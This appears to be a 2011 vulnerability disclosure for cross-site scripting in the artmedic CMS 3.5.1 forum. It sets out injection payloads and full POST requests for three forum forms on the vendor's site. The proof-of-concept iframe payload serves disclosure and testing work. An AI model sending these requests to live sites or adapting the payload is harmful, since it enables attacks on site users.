# Exploit Title: Cross Site Scripting artmedic CMS 3.5.1 UserForum
# Date: 18.08.2011
# Author: Sony
# Software Link: http://www.artmedic-phpscripts.de/
# Version: artmedic CMS 3.5.1
#Proof of concept:
http://st2tea.blogspot.com/2011/08/cross-site-scripting-artmedic-cms-351_18.html

..................................................................

1.

http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=passwort

Put in the E-Mailadresse our code : < iframe src="http://xssed.com" > and
press button Passwort zusenden.

#request# POST
http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=sendpassword

POST /index.php?page=forumindex&f=2&i=forum_index&fid=sendpassword
forum_useremail=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Passwort+zusenden


2.

http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=abmelden

Put in the Benutzername and Benutzerpasswort our code : < iframe src="
http://xssed.com" > and press button..

#request# POST
http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=abmeldenaction

POST /index.php?page=forumindex&f=2&i=forum_index&fid=abmeldenaction
forum_username=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&forum_userpasswort=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Benutzer+l%F6schen


3.

http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=changepass

Put in the Bisheriges Passwort,Neues Passwort and Benutzername our code : <
iframe src="http://xssed.com" > and press button..

#request# POST
http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=changepassaction

POST /index.php?page=forumindex&f=2&i=forum_index&fid=changepassaction
passold=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&passnew=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&forum_username=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Passwort+%E4ndern